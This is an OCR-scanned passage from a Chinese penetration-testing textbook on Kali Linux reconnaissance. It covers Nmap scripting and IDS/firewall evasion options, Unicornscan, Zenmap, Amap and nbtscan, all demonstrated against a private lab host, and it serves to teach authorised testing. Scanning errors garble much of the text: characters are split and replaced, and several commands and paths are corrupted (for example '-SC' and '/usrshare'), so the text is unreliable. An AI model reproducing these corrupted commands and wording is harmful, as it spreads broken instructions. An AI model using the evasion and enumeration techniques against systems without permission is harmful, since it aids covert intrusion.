当前 ， 您 只 能 逐个 指定 目标 主机 的 IPv6 地 址 。 举 例 来 说 ， 可 采用 下 


述 指令 扫描 IPv6 地 址 的 目标 主机 。 

nmap -6 fe80::a00:27ff:fe43:1518 

上 述 指令 的 返回 结果 如 下 。 

Nmap scan report for fe80::a00:27ff:fe43:1518 

Host is up (0.0014s latency). 

Not shown: 996 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

53/tcp open domain 

2121/tcp open ccproxy-ftp 

5432/tcp open postgresql 

MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds 

上 述 信息 表明 ， 同 一 台 主 机 在 IPv6 网 络 里 开放 的 端口 比 它 在 IPv4 网 
络 里 开放 的 端口 数量 要 少 。 这 是 因为 部 分 服务 程序 尚未 文 持 IPv6 网 络 。 

9. 脚本 引擎 

Nmap ”本 身 就 是 功能 强大 的 网 络 探测 工具 。 而 它 的 脚本 引 警 功能 

(Nmap Scripting Engine, NSE) 更 让 Nmap WERE. NSE 可 使 用 户 

的 各 种 网 络 检查 工作 更 为 自动 化 ， 有 助 于 识别 应 用 程序 中 新 发 现 的 漏 
洞 、 检 测 程序 版 本 等 Nmap 原 本 不 具有 的 功能 。 虽 然 Nmap 软 件 包 具有 各 
种 功能 的 脚本 ， 但 是 为 了 满足 用 户 的 特定 需求 ， 它 还 文 持 用 户 撰写 自 定 
义 脚本 。 

NSE 自 带 的 脚本 由 Lua 语 言 (http://www.lua.org) 编写 。 这 些 脚本 可 
以 分 成 12 个 类 别 。 


e auth: 此 类 脚本 使 用 其 力 破 解 等 技术 找 出 目标 系统 上 的 认证 信 





ls 








e default: 局 用 --sC 或 者 -A 选项 时 运行 此 类 脚本 。 这 类 脚本 同时 具 


有 下 述 特点 : 

执行 速度 快 ; 

输出 的 信息 有 指导 下 一 步 操 作 的 价值 ; 

输出 信息 内 容 丰 定 、 形 式 人 简洁 ; 

必须 可 靠 ; 

不 会 侵入 目标 系统 ; 

能 泄露 信息 给 第 三 方 。 

e discovery: 该 类 脚本 用 于 探索 网 络 。 

e dos: 该 类 脚本 可 能 使 目标 系统 拒绝 服务 ， 请 谍 慎 使 用 。 

e exploit: 该 类 脚本 利用 目标 系统 的 安全 漏洞 。 在 运行 这 类 脚本 之 
前 ， 渗 透 测 试 人 员 需 要 获取 被 测 单位 的 行动 许可 。 

e external: 该 类 脚本 可 能 泄露 信息 给 第 三 方 。 

e fuzzer: 该 类 脚本 用 于 对 目标 系统 进行 模糊 测试 。 

e instrusive: 该 类 脚本 可 能 导致 目标 系统 崩 尝 ， 或 耗 尽 目标 系统 的 
所 有 资源 。 

e malware: 该 类 脚本 检查 目标 系统 上 是 否 存 在 恶意 软件 或 后 门 。 

e safe: 该 类 脚本 不 会 导致 目标 服务 衣 涡 、 拒 绝 服务 且 不 利用 漏 
洞 。 

e version: 配合 版 本 检测 选项 CsV) ， 这 类 脚本 对 目标 系统 的 服 
务 程序 进行 深入 的 版 本 检测 。 
e vuln: 该 类 脚本 可 检测 检查 目标 系统 上 的 安全 漏洞 。 
在 Kali Linux 系 统 中 ，Nmap 脚 本 位 于 目录 /usrshare/nmap/scripts。 目 
Kali Linux 收 录 的 6.25 版 的 Nmap 带 有 430 多 个 脚本 。 
在 使 用 NSE 脚 本 时 ， 可 以 下 命令 行 里 使 用 下 述 选 项 。 
e -SC 或 --script=default: 启动 默认 类 NSE 脚本 。 
e --script <filename>|<category>|<directories>: 根据 指定 的 文件 名 、 
类 别名 、 目 录 名 ， 执 行 相应 的 脚本 。 
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e --script-args <args>: 这 个 选项 用 于 给 脚本 指定 参数 。 例 如 ， 在 使 
用 认证 类 脚本 时 ， 可 通过 这 个 选项 指定 用 户 名 和 密码 。 

举例 来 说 ， 如 果 要 使 用 默认 类 的 脚本 对 主机 192.168.56.103 进行 扫 
描 ， 可 使 用 下 述 指令 。 

nmap -SC 192.168.56.103 

上 述 指令 的 运行 结果 如 下 。 

Nmap scan report for 192.168.56.103 

Not shown: 977 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 








|_ftp-anon: Anonymous FTP login allowed (FTP code 230) 

22/tcp open ssh 

| ssh-hostkey: 1024  60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd 
(DSA) 

| 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 

25/tcp open smtp 

| smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 
10240000, 

VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 
8BITMIME, DSN, 

| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/ 

organizationName=OCOSA/stateOrProvinceName=There is no such 
thing outside 

US/countryName=X X 

| Not valid before: 2010-03-17T14:07:45+00:00 

| Not valid after: 2010-04-16T14:07:45+00:00 

| ssl-date: 2013-07-21T08:40:20+00:00; -4s from local time. 


53/tcp open domain 

| dns-nsid: 

|_ bind.version: 9.4.2 

111/tcp open rpcbind 

| rpcinfo: 

| program version port/proto service 

| 100000 2 111/⁄tcp rpcbind 

| 100000 2 111/udp rpcbind 

| 100003 2,3,4 2049/tcp nfs 

| 100003 2,3,4 2049/udp nfs 

| 100005 1, 2, 3 35075/udp mountd 

| 100005 1, 2, 3 59685/tcp mountd 

| 100021 1, 3, 4 37466/tcp nlockmgr 

| 100021 1, 3, 4 60726/udp nlockmgr 

| 100024 1 36880/udp status 

|. 100024 1 38557/tcp status 

3306/tcp open mysql 

| mysql-info: Protocol: 10 

| Version: 5.0.51a-3ubuntu5 

| Thread ID: 7 

| Some Capabilities: Connect with DB, Compress, SSL, Transactions, 
Secure Connection 

| Status: Autocommit 

| Salt: !"BijWW-x7HCVi,<*[1 

5900/tcp open vnc 

| vnc-info: 


| Protocol version: 3.3 


| Security types: 

| Unknown security type (33554432) 

6667/tcp open irc 

| irc-info: Server: irc. Metasploitable.L. AN 

| Version: Unreal3.2.8.1. irc. Metasploitable.L. AN 

| Lservers/Lusers: 0/1 

| Uptime: 0 days, 0:15:26 

| Source host: 50388A6E.97684684.FFFA6D49.IP 

| Source ident: OK nmap 

8180/tcp open unknown 

| http-favicon: Apache Tomcat 

| http-methods: No Allow or Public header in OPTIONS response 
(status code 200) 

| http-title: Apache Tomcat/5.5 

MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 

Host script results: 

| nbstat NetBIOS name: METASPLOITABLE, NetBIOS user: 
«unknown», NetBIOS 

MAC: «unknown? 

| smb-os-discovery: 

| OS: Unix (Samba 3.0.20-Debian) 

| NetBIOS computer name: 

| Workgroup: WORKGROUP 

| System time: 2013-07-21T04:40:20-04:00 

Nmap done: 1 IP address (1 host up) scanned in 46.87 seconds 

可 见 ， 在 使 用 NSE 的 默认 类 脚本 后 ，Nmap 获 取 的 信息 更 为 全 面 。 

您 还 可 能 需要 获取 目标 主机 的 特定 信息 。 此 时 可 以 单独 使 用 脚本 文 











件 。 如 果 要 获取 HTTP 服 务 器 的 信息 ， 将 会 发 现 NSE 的 脚本 里 有 很 多 脚 
本 都 是 分 析 HTTP 服 务 的 。 这 些 脚本 有 http-enum、http-headers、http- 
methods 和 http-php-version。 我 们 可 以 使 用 下 述 指令 。 

nmap --script http-enum,http-headers,http-methods,http-php-version -p 
80 

192.168.56.103 

上 述 指令 的 运行 结果 如 下 。 

Nmap scan report for 192.168.56.103 

Host is up (0.0010s latency). 

PORT STATE SERVICE 

80/tcp open http 

| http-enum: 

| /tikiwiki/: Tikiwiki 

| /test/: Test page 

| phpinfo.php: Possible information file 

| /phpMyAdmin/: phpMyAdmin 

| /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 
(ubuntu) dav/2' 

| /icons/: Potentially interesting folder w/ directory listing 

|_ /index/: Potentially interesting folder 

| http-headers: 

| Date: Sun, 21 Jul 2013 08:45:07 GMT 

| Server: Apache/2.2.8 (Ubuntu) DAV/2 

| X-Powered-By: PHP/5.2.4-2ubuntu5.10 

| Connection: close 


| Content-Type: text/html 


|_ (Request type: HEAD) 

|_http-methods: No Allow or Public header in OPTIONS response 
(status code 200) 

| http-php-version: Versions from logo query (less accurate): 5.1.3 - 
5.1.6, 5.2.0 - 5.2.17 

| Versions from credits query (more accurate): 5.2.3 - 5.2.5 

| Version from header x-powered-by: PHP/5.2.4-2ubuntu5.10 

MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 

Nmap done: 1 IP address (1 host up) scanned in 24.47 seconds 

相 比 不 使 用 脚本 而 言 ， 在 使 用 与 HITP 相 关 的 NSE 脚 本 之 后 ， 我 们 
得 到 与 Web 服 务 有 关 的 更 多 信息 。 

e Web 服务 器 上 有 多 个 值得 关注 的 目录 : Tikiwiki, test — 
phpMyAdmin. 

e 服务 器 上 的 phpinfo.php 可 提供 更 多 信息 。 

e 服务 器 上 PHP 是 5.2.3-5.2.5 之 间 的 某 个 版 本 。 

在 介绍 Nmap 的 时 候 ， 我 们 不 得 不 提 一 个 端口 扫描 脚本 。 

NSE 脚 本 之 中 ， 有 一 个 名 为 Nmap NSEVulscan 的 脚本 。 它 可 从 
http://www.computec. ch/mruef/software/nmap_nse_vulscan-1.0.tar.gz 下 
载 。 这 个 脚本 能 够 根据 目标 主机 的 版 本 信息 ， 在 多 个 网 站 上 搜索 这 些 版 
本 的 相关 漏洞 。 这 些 网 站 包括 CVE (http://cve.mitre.org) 、 
OSVDB (Chttp://www.osvdb.org/) ~ scip VulDB  Chttp://www.scip.ch/? 
vuldb) . SecurityTracker Chttp://securitytracker.com/) 和 Security 


Focus Chttp://www.securityfocus.com/) 。 


使 用 上 述 脚本 之 后 ， 可 获取 的 扫描 结果 如 图 6.5 所 示 。 


PORT STATE SERVICE REASON VERSION 

22/tcp open ssh syn-ack OpenSSH 5.8pi1 Debian lubuntu3 
(Ubuntu Linux; protocol 2.0) 

| vulscan: scipvuldb - http://www.scip.ch/en/?vuldb (12 findings): 

| [7775] Red Hat Linux/Fedora 6 OpenSSH glibc error() privilege escalation 
| [4584] OpenSSH up to 5.7 auth-options.c information disclosure 

| [4282] OpenSSH S.x Legacy Certificate Handler buffer overflow 

| [2667] OpenBSD OpenSSH up to 4.5 Separation Monitor Designfehler 

| [2578] OpenBSD OpenSSH up 4.4 Signal Handler race condition 

| (1999] OpenBSD OpenSSH up 4.2pl scp system() Designfehler 

| [1724] OpenBSD OpenSSH up 4.2pl GSSAPIDelegateCredentials Designfehler 
| [1723] OpenBSD OpenSSH up to 4.2pl Dynamic Port Forwarding Designfehler 

| [1083] Nokia IPSO 3.x OpenSSH Designfehler 

| [299] OpenBSD OpenSSH 3.7p1/3.7.1p1 PAM Handler Konfigurationsfehler 

| [287] OpenBSD OpenSSH up to 3.7.1 buffer append space() buffer overflow 

| [100] OpenSSH Client IP Restrictions weak authentication 

| 
| 


cve - http://cve.mitre.org (69 findings): 
| [CVE-2012-6066] freeSSHd.exe in freeSSHd through 1.2.6 allows remote 
attackers to bypass authentication via a crafted session, as demonstrated 
by an OpenSSH client with modified versions of ssh.c and sshconnect2.c. 
| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia 
Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 
6.3.0 through 6.3.2 on UNIX and Linux, when old-style password 
authentication is enabled, allows remote attackers to bypass authentication 
via a crafted session involving entry of blank passwords, as demonstrated 
by a root login session from a modified OpenSSH client with an added 
input userauth passwd changereq call in sshconnect2.c. 
| [CVE-2012-5536] A certain Red Hat build of the pam ssh agent auth module 
on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc 
error function instead of the error function in the OpenSSH codebase, which 
allows local users to obtain sensitive information from process memory or 
possibly gain privileges via crafted use of an application that relies on 
this module, as demonstrated by su and sudo. 
| [CVE-2012-0814] The auth parse options function in auth-options.c in sshd 
in OpenSSH before 5.7 provides debug messages containing authorized keys 
command options, which allows remote authenticated users to obtain 
potentially sensitive information by reading these messages, as 


图 6.5 





10. 规避 检测 的 选项 

在 渗透 测试 的 工作 中 ， 目 标 主机 通常 处 于 防火 墙 或 IDS 系统 的 保护 
之 中 。 在 这 种 环境 中 使 用 Nmap 的 默认 选项 进行 扫描 ， 不 仅 会 被 发 现 ， 
而 且 往 往 一 无 所 获 。 此 时 ， 我 们 就 要 使 用 Nmap 规 避 检 测 的 有 关 选 项 。 

e -f (使 用 小 数据 包 ) : 这 个 选项 可 避免 对 方 识别 出 我 们 探测 的 数 
据 包 。 指 定 这 个 选项 之 后 ，Nmap 将 使 用 8 字 节 甚至 更 小 数据 体 的 数据 
£5, 0 

e mtu: 这 个 选项 用 来 调整 数据 包 的 包 大 小 。MTU (Maximum 


Transmission Unit， 最 大 传输 单元 ) 必须 是 8 的 整数 倍 ， 人 否则 Nmap 将 报 
错 。 

e-D CAH) : 这 个 选项 应 指定 假 卫 ， 即 诱饵 的 耳 。 局 用 这 个 选项 
之 后 ，Nmap ”在 发 送 侦 测 数据 包 的 时 候 会 掺 杂 一 些 源 地 址 是 假 耻 〈 诱 
THO 的 数据 包 。 这 种 功能 意 在 以 藏 木 于 林 的 方法 掩盖 本 机 的 真实 卫 。 也 
就 是 说 ， 对 方 的 log 还 会 记录 下 本 机 的 真实 IP。 您 可 使 用 RND 生 成 随机 
的 假 IP 地 址 ， 或 者 用 RND: number 的 参数 生成 <number> 个 假 IP 地 址 。 您 
所 指定 的 诱饵 主机 应 当 在 线 ， 人 否则 很 容易 击 涡 目 标 主机 。 另 外 ， 使 用 了 
过 多 的 诱饵 可 能 造成 网 络 拥堵 。 尤 其 是 在 扫描 客户 的 网 络 的 时 候 ， 您 应 
当 极 力 避 免 上 述 情况 。 

e --source-port <portnhumber> 或 -g GRM mA) : "ndm Ade A 
许 某 些 源 端口 的 入 站 流量 ， 这 个 选项 就 非常 有 用 。 

e --data-length: 这 个 选项 用 于 改变 Nmap 发 送 数据 包 的 默认 数据 长 
度 ， 以 避免 被 识别 出 来 是 Nmap 的 扫描 数据 。 

e --max-parallelism: 这 个 选项 可 限制 Nmap 并 发 扫描 的 最 大 连接 





数 。 

e --scan-delay «time»: 这 个 选项 用 于 控制 发 送 探测 数据 的 时 间 间 
隔 ， 以 避免 达到 IDSAPS 端 口 扫描 规则 的 阔 值 。 

Nmap 的 官方 手册 详细 介绍 了 规避 探测 的 各 种 选项 。 如 果 您 需要 详 
细 了 解 这 些 内 容 ， 请 参照 官方 手册 http:/nmap.org/book/man-bypass- 


firewalls-ids.html. 








6.2.2 Unicornscan 


Unicornscan 是 信息 收集 和 关联 分 析 的 引 击 。 它 能 对 TCP/IP 设 备 发 起 
主动 扫描 ， 并 根据 其 啊 应 进行 分 析 。Unicornscan 有 具备 下 述 特性 : 

e 可 进行 异步 无 状态 TCP 端口 扫描 ; 

e 可 通过 异步 无 状态 TCP 扫描 获取 TCP banner; 








e 可 进行 异步 UDP 端口 扫描 ; 

e 可 通过 主动 方式 和 被 动 方式 识别 远程 操作 系统 和 应 用 程序 。 

默认 安装 的 Kali Linux 并 不 带 有 Unicornscan 程序 。 您 可 通过 软件 仓 

apt-get install unicornscan 

如 需 司 动 Unicornscan， 可 在 终端 中 使 用 下 述 指令 。 

# Unicornscan -h 

该 指令 将 显示 所 有 的 选项 及 使 用 方法 。 

Unicornscan ”和 其 他 类 似 工具 主要 区 别 在 于 其 扩展 性 和 高 效 性 。 经 
验 表 明 ，UDP ”端口 扫描 的 耗 时 都 很 长 ， 扫 摘 整 个 网 段 的 UDP 端 口 的 耗 
时 更 长 。 不 过 Unicomscan 在 这 方面 的 性 能 卓越 。 

您 可 以 设置 Unicomscan 每 秒 发 送 多 少 个 包 。 每 秒 发 送 包 (PPS) X 
置 得 越 高 ， 扫 揪 的 速度 也 就 越 快 ， 但 会 导致 网 络 负 载 加 重 ， TER 
用 此 功能 。PPS 的 默认 值 是 300。 

本 文 将 使 用 Unicomscan 的 默认 选项 扫描 一 台 目 标 主机 ， 以 介绍 指令 
和 输出 。 

假设 我 们 要 扫描 主机 192.168.56.103， 检 测 它 的 UDP 协议 (-m U) 
的 1-65535 端 口 ， 并 但 看 程序 的 详尽 输出 〈-Iv〉， 那 么 我 们 需要 使 用 下 
述 指 令 。 

# unicornscan -m U -Iv 192.168.56.103:1-65535 

运行 上 述 指令 后 ， 程 序 的 提示 信息 如 下 。 

adding 192.168.56.103/32 mode 'UDPscan' ports '1-65535' pps 300 


using interface(s) eth0 








scaning 1.00e+00 total hosts with 6.55e+04 total packets, should take a 
little longer than 3 Minutes, 45 Seconds 

上 述 信息 表明 ， 在 使 用 PPS 的 默认 值 的 情况 下 ，Unicornscan 的 扫 
描 时 间 大 约 是 3 分 钟 。 为 了 加 快 扫描 速度 ， 我 们 把 发 包 速 率 调整 为 1 万 


(-r 10000) 。 


unicornscan -m U -Iv 192.168.56.103/24:1-65535 -r 10000 

运行 上 述 指令 后 ， 程 序 的 提示 信息 如 下 。 

adding 192.168.56.103/32 mode 'UDPscan' ports '1-65535' pps 10000 
using interface(s) eth0 


scaning 1.00e+00 total hosts with 6.55e+04 total packets, should take a 








little longer than 13 Seconds 





调整 发 包 速 率 PPS 参数 之 后 ， 扫 描 速 度 提 升 很 多 。 请 注意 您 只 能 在 


网 络 速度 足够 快 的 情况 下 才能 修改 这 个 参数 ， 人 否则 将 拖 震 整个 网 络 。 


上 述 指令 的 扫 摘 结果 如 下 。 

UDP open 192.168.56.103:137 ttl 64 

UDP open 192.168.56.103:53 ttl 64 

UDP open 192.168.56.103:41250 ttl 64 

UDP open 192.168.56.103:2049 ttl 64 

UDP open 192.168.56.103:111 ttl 64 

sender Statistics 7586.6 pps with 65544 packets sent total 


listener statistics 14 packets recieved 0 packets dropped and 0 interface 


drops 


UDP open domain[ 53] from 192.168.56.103 ttl 64 
UDP open sunrpc[ 111] from 192.168.56.103 ttl 64 
UDP open netbios-ns[ 137] from 192.168.56.103 ttl 64 
UDP open shilp[ 2049] from 192.168.56.103 ttl 64 
UDP open unkown[41250] from 192.168.56.103 ttl 64 


6.2.3 Zenma 
Zenmap 是 Nmap 的 图 形 化 工具 。 相 较 于 Nmap，Zenmap 具 备 如 下 优 


e Zenmap 的 交互 性 更 好 ， 输 出 更 为 直观 ， 其 至 能 将 网 络 的 探索 结 
果 绘 制 成 拓扑 图 。 

e 可 以 比较 两 次 扫描 的 结果 。 

e 能 够 记录 扫描 的 结 

e 渗透 人 员 可 调整 Zenmap 的 配置 文件 ， 以 使 用 相同 的 配置 进行 多 
次 扫描 。 

e 会 显示 所 执行 的 指令 ， 便 于 渗透 测试 人 员 检 查 指令 的 正确 性 。 

Wisi Zenmap 程序 ， 可 在 桌面 菜单 中 依次 选中 Kali Linux | 
Information Gathering | Network scanners | Zenmap， 也 可 在 终端 中 使 用 下 
述 指令 。 

# zenmap 

该 命令 执行 将 显示 Zenmap 主 窗口 〈 见 图 6.6) 。Zenmap 预 设 有 10 种 
扫描 模式 的 配置 文件 。 点 击 菜单 Profile 就 可 以 看 到 相应 扫描 方式 以 及 相 
应 的 命令 选项 。 程 序 的 Command 文 本 框 会 显示 具体 的 指令 和 选项 。 


Zenmap 








Scan Tools Profile Help 
Target: v» Profile: | Regular scan 


Command: | nmap Intense scan 
Intense scan plus UDP 
p Services Nmap Output) Ports/ intense scan, all TCP ports 
OS 4 Host X Intense scan, no ping 
Ping scan 
Quick scan 
Quick scan plus 


Quick traceroute 


Regular scan 


Slow comprehensive scan 


图 6.6 
如 果 预 设 的 扫描 选项 未 能 符合 我 们 的 需求 ， 我 们 可 以 创建 一 个 新 的 
扫描 配置 文件 profile) ， 还 可 以 编辑 已 有 的 配置 文件 。 我 们 可 以 通过 





Profile 染 单 完成 这 些 操作 。 

如 需 新 建 配 置 文件 ， 可 选择 菜单 项 New Profile 或 编辑 Command X 
本 框 ， 或 使 用 快捷 键 Crl+P。 如 需 编 辑 已 有 的 配置 文件 ， 可 选择 沫 单项 
Edit Selected Profile 或 使 用 快捷 键 Ctrl+E。 

在 调整 选项 时 ， 可 在 选项 卡 (Profile, Scan, Ping. Scripting. 
Target、Source、Other 和 Timing) 下 根据 需求 进行 相应 配置 。 在 调整 过 
配置 选项 之 后 ， 单 击 Save Changes 按 钮 保存 该 扫描 配置 。 这 个 过 程 如 图 
6.7 所 示 。 





Profile Editor 





nmap 


Help 
Disable reverse ONS 
Scan options resolution 


Profile Scan| Ping Scripting Target Source | Other Timing 


Targets (optional): ll Never do reverse DNS. This 


can slash scanning times. 
TCP scan: None 9 


Non-TCP scans: None 
Timing template: None 
Enable all advanced/aggressive options (-A) 
Operating system detection (-O) 
Version detection (-sV) 
Idle Scan (Zombie) (-si) 
FTP bounce attack (-b) 
Disable reverse DNS resolution (-n) 
IPv6 support (-6) 


Cancel | f Save Changes 


图 6.7 
本 文选 用 Regular Scan CH MAH) 的 配置 文件 ， 扫 描 192.168.56.1- 
254 的 所 有 主机 ， 如 图 6.8 所 示 。 


Scan Tools Profile Help 


Target: [192155561254 |v] Profie: sen) (cane 
Command: |nmap 192.168.56.1-254 


— e Services dem ——— 


nmap 192.168.56.1-254 


192.168.56.100 


Nmap scan report for 192.168.56.101 
192.168.56.101 Host is up (0.0013s latency). 
192.168.56.102 Not shown: 999 filtered ports 


PORT STATE SERVICE 
192.168.56.103 1025/tcp open NFS-or-IIS 


MAC Address: 08:00:27:00:E0:35 (Cadmus 
Computer Systems) 


Nmap scan report for 192.168.56.102 

Host is up (0.000047s latency). 

All 1666 scanned ports on 192.168.56.102 are 
closed 


Nmap scan report for 192.168.56.103 
Host is up (0.00085s latency). 

Not shown: 977 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 


图 6.8 
如 果 需 要 查看 网 络 拓扑 图 ， 可 点 击 Topology 标 签 ， 这 将 看 到 图 6.9 所 
示 的 界面 。 














Zenmap 
Scan Tools Profile Help 


Target: [192 168.56.1-254 Y | Profile: |Regular scan VY | | Scan 


Command: |nmap 192.168.56.1-254 


Services | | Nmap Output Ports / Hosts Topology Host Details Scans 














Save Graphic 


os Host Hosts Viewer Fisheye Controls 
- 
W 192168 56. ws 
M 192.168.56.: 
M 192.168.56.: 
a. Oocalhost 
Oi.168.56.102 “O192.168.56.100 


Oiez.168.56.101 


and spread factor (0.50 zi 


MEN > EMI nn | ae Les là 
= D Fisheye on ring |1.00 a with interest factor [2 00 | 
Filter Hosts : i 





图 6.9 
如 需 保 存 Zenmap 的 扫 拉 结果， 可 在 Scan 沫 单 中 选择 Save Scan. 
Zenmap 将 会 询问 将 文件 保存 至 何 处 ， 默 认 情 况 下 将 保存 为 XML 文件 


( 见 图 6.10) 。 








Name: | xml | 
Save in folder: | < | Ejroot | m Desktop Create Folder 
Places Name v Size Modified W 
Q Search | 





© Recently Used 
Ea root 


CJ File System 


Select File Type: Nmap XML format (xml) 2 





Cancel Save 





图 6.10 
如 需 比 较 两 次 扫 拉 结果 之 间 的 差异 ， 首 先进 行 第 一 次 扫 拉 ， 并 保存 
第 一 次 扫描 的 扫描 结果 。 在 修改 扫描 目标 之 后 ， 进 行 第 二 次 扫描 并 再 次 
保存 扫描 结果 。 然 后 ， 在 Tools 采 单 中 选择 Compare Results， 对 扫描 结果 
进行 比较 。 


点 击 两 个 Open 按 钮 ， 分 别 指定 A Scan 和 B Scan 的 扫描 结果 ， 如 图 
6.11 所 示 。 


Compare Results 


A Scan B Scan 
> Scan Output > Scan Output 
most 1S Up. D 


+Not shown: 979 closed ports 
PORT STATE SERVICE VERSION 
21/tcp open ftp 

-22/tcp open ssh 

23/tcp open telnet 

25/tcp | open smtp 

53/tcp open domain 

80/tcp open http 

1ll/tcp open rpcbind 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
512/tcp open exec 

513/tcp open login 

514/tcp open shell 

1099/tcp open rmiregistry 
1524/tcp open ingreslock 
2049/tcp open nfs 

2121/tcp open ccproxy-ftp 
-3306/tcp open mysql 


RAR? /tren anan noctaroenm 












| Close 
图 6.11 


字符 "代表 B Scan 的 结果 中 没有 该 项 内 容 ， 相 对 地 ， 字 符 “+" 表 明 B 
Scan 的 扫描 结果 中 增加 了 该 项 扫描 结果 。 

上 述 扫描 结果 表明 ， 在 第 二 次 扫描 中 的 SSH 端 口 和 MySQL 庙 口 都 不 
再 处 于 开放 状态 ， 关 闭 端口 的 数目 也 从 977 个 相应 变化 为 979 个 。 


6.2.4 Amap 
Amap 程 序 可 检测 在 指定 端口 上 运行 的 应 用 程序 信息 。Amap 回 目标 

















问 口 发 送 检测 数据 ， 在 收 到 目标 啊 应 之 后 ， 将 啊 应 信息 与 数据 库 中 结果 
进行 匹配 ， 并 显示 出 匹配 的 应 用 程序 。 

在 Kali Linux 中 ，Amap 检测 数据 包 的 配置 文件 
为 /usretc/appdefs.trig， 而 啊 应 信息 的 文件 是 /asretc/appdefs.resp。 

如 需 局 动 Amap 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

amap 

该 命令 将 显示 它 的 使 用 说 明和 指令 范例 。 

本 例 将 使 用 Amap 程 序 分 析 目 标 主机 22 端 口上 运行 的 应 用 程序 。 我 
们 局 用 -b 选 项 以 获取 端口 的 banner 信 息 ， 同 时 通过 -q 选 项 禁止 程序 报告 
关闭 的 《或 不 可 识别 的 ) 端口 。 我 们 使 用 下 述 指令 。 

amap -bq 192.168.56.103 22 

上 述 指令 的 运行 结果 如 下 。 

Protocol on 192.168.56.103:22/tcp matches ssh - banner: SSH- 
2.00penSSH_4.7p1 Debian-8ubuntul\n 

Protocol on 192.168.56.103:22/tcp matches ssh-openssh - banner: SSH- 
2.0-OpenSSH_4.7p1 Debian-8ubuntu1in 

Amap 程 序 还 能 够 识别 指定 端口 上 运行 的 应 用 类 型 及 其 版 本 信息 。 

如 需 扫描 更 多 的 端口 ， 可 在 命令 行 中 指定 多 个 端口 ， 端 口 之 间 用 空 
Reo ba, fu: 

amap -bq 192.168.56.103 80 3306 

上 述 指令 的 运行 结果 如 下 。 

Protocol on 192.168.56.103:3306/tcp matches mysql - banner: 

>\n5.0.51a-3ubuntu5S/?,'’~yel,nd,M~ Ti3ap/5Bad handshake 

Protocol on 192.168.56.103:22/tcp matches ssh - banner: 

SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\n 
Protocol on 192.168.56.103:22/tcp matches ssh-openssh - banner: 
SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\n 




















Amap 可 以 识别 在 3306 端 口上 运行 的 是 MySQL 服 务 ， 但 在 识别 22 端 
口上 运行 的 服务 时 ， 却 找到 了 多 个 匹配 。 
在 快速 识别 应 用 服务 程序 方面 ，Amap 程 序 可 谓 一 校 独 秀 。 


6.3 SMB 枚 9 


如 果 您 所 测试 的 目标 主机 是 Windows 主机 ， 那 么 使 用 nbtscan 之 类 
的 SMB (Server Message Block) 枚 举 工 具 可 以 直截了当 地 获取 该 系统 
的 信息 。 

nbtscan 工 具 可 以 扫描 IP 地 址 并 获取 NetBIOS 名 称 信息 。 它 所 生成 的 
扫描 报告 含有 相应 主机 的 IP 地 址 、NetBIOS 计 算 机 名 、 服 务 名 称 、 己 登 
录 的 用 户 名 和 MAC 地 址 信息 。 

这 些 信息 在 渗透 测试 的 后 续 阶 段 将 发 挥 作用 。Kali 的 nbtscan 程 序 和 
Windows 自 带 的 nbtstat 程 序 不 同 ， 它 可 对 一 个 网 段 内 所 有 IP 地 址 进行 操 
作 。 您 可 以 想象 得 出 来 ， 这 款 工具 将 产生 大 量 的 网 络 流量 ， 而 且 可 能 被 
目标 主机 记录 在 Log 里 。 

如 需 了 解 NetBIOS 报 告 中 每 个 服务 的 功能 ， 可 在 微软 知识 库 〈URL 
地 址 为 http://support.microsoft.com/kb/163409 ) 里 查询 NetBIOS 服 务 名 
称 的 第 16 个 字符 ( 即 NetBIOS 后 级 ) 。 

可 以 在 终端 中 直接 输入 nbtscan 来 启动 它 。 

如 和 欲 搜索 192.168.56.0 内 各 主机 的 NetBIOS 名 称 ， 可 使 用 下 述 指令 。 

nbtscan 192.168.56.1-254 

该 指令 的 返回 结果 如 下 。 

Doing NBT name scan for addresses from 192.168.56.1-254 

IP address NetBIOS Name Server User MAC address 








192.168.56.103 METASPLOITABLE <server> METASPLOITABLE 

00:00:00:00:00:00 

上 述 结果 表明 ， 程 序 找到 了 1 个 名 为 METASPLOITABLE 的 NetBIOS 
名 称 。 

接 下 来 ， 我 们 使 用 下 述 指令 查看 这 台 主 机 的 网 络 服务 。 

nbtscan -hv 192.168.56.103 

该 指令 的 返回 结果 如 下 。 

Doing NBT name scan for addresses from 192.168.56.103 

NetBIOS Name Table for Host 192.168.56.103: 

Incomplete packet, 281 bytes long. 








Name Service Type 
METASPLOITABLE Workstation Service 
METASPLOITABLE Messenger Service 
METASPLOITABLE File Server Service 
METASPLOITABLE Workstation Service 
METASPLOITABLE Messenger Service 
METASPLOITABLE File Server Service 
WORKGROUP Domain Name 
WORKGROUP Browser Service Elections 
WORKGROUP Domain Name 
WORKGROUP Browser Service Elections 
Adapter address: 00:00:00:00:00:00 
上 述 结果 表明 ， 主 机 METASPLOITABLE 运 行 着 File Server Service 
和 Messenger Service 等 网 络 服务 。 


6.4 SNMP 枚 举 


本 节 将 介绍 检查 SNMP (Simple Network Monitoring Protocol) 协议 
的 几 款 工具 。 虽 然 多 数 SNMP 信 息 看 上 去 并 不 那么 重要 ， 但 是 对 于 渗透 
测试 人 员 来 说 ， 他 们 可 以 从 配置 不 当 的 SNMP 设 备 上 获取 配置 文件 ， 挖 
掘 重要 信息 ， 甚 至 可 能 有 权限 修改 它 的 配置 文件 。 

